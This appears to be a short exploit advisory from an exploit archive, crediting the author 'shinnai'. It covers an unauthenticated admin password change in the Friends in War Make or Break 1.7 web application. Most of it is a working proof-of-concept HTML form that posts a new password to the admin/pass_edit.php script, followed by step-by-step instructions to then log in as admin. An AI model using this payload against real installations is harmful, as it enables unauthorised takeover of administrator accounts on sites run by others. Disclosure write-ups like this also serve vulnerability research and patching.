17 lines
No EOL
753 B
HTML
17 lines
No EOL
753 B
HTML
Friends in War Make or Break 1.7 - Unauthenticated admin password change
|
|
|
|
Url: http://software.friendsinwar.com/
|
|
http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9
|
|
|
|
Author: shinnai
|
|
mail: shinnai[at]autistici[dot]org
|
|
site: http://www.shinnai.altervista.org/
|
|
---------------------------------------------------------------------
|
|
|
|
PROOF OF CONCEPT:
|
|
<form method="post" action="http://localhost/mob/admin/pass_edit.php?username=1">
|
|
<label>1) Choose a new password<br>2) Click on "Submit"<br>3) Login using "admin" and your new password<br><br></label>
|
|
<input type="text" name="password" value="ChangeMe">
|
|
<input type="text" name="submit" value="Edit+Password" hidden=true>
|
|
<input type="submit" value="Submit">
|
|
</form> |